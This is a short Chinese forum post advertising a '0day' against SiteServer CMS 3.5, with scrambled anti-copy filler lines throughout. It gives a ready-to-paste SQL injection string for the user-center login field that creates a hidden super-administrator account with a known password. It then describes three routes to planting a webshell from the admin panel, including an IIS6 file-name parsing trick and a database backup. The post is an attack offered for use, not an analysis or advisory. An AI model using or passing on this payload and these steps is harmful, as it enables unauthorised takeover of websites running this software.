SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
7 Y! x. p" j* L. v
' ]+ E1 s& K; r6 Istieserver官网:www.siteserver.cn
% g# u/ M" |* Z+ ?" Q8 d1 }
/ o  c6 ?: W6 w. ?) B! R9 J

EXP:
3 b1 F, p# _6 f! b
4 G5 F5 S, X: B  x) e直接访问UserCenter/login.aspx
! _) P8 S6 f; [% Q$ J& }
. A' m- `( {6 L. l' q0 A3 B- K

5 j& f( ^$ ], {# r% |9 H用户名处输入：
5 j' N& i( l& E, w+ z7 K2 J
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

5 a  G2 o8 d' `4 e& F

密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。



之后再访问后台SiteServer/login.aspx用插入的用户登陆
7 E$ M6 s/ I1 A0 h8 c) W9 o
5 U, J% L. k9 G' A; d5 C
& `5 c) [+ n" {0 ]% N# A, s
/ r6 H3 E' z0 J, e0 h后台拿webshell的三种方法：
  j" g0 s# r9 q. F* j
* l% S5 s( v) p7 J- s' L9 B! |一、

站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
9 a: J& X, A& i: j
二、

成员权限-》添加用户-》用户名为：1.asp

http://127.0.0.1/usercenter/
1 j1 H- A1 F. s
# T- E3 e* {! A# y) N" j& x6 P用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

0 {& Z6 u, f4 q& e, H（ps：后台添加用户时不会验证是否含有非法字符）

% Y" L. Y" Z6 D+ [8 G! h- I. Q: m三、

系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径

系统工具-》数据库工具-》SQL语句查询
( V/ ~9 ^$ Z. o# j, C) _% H1 }这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
/ E. l$ y" a  z* t/ L0 @0 Y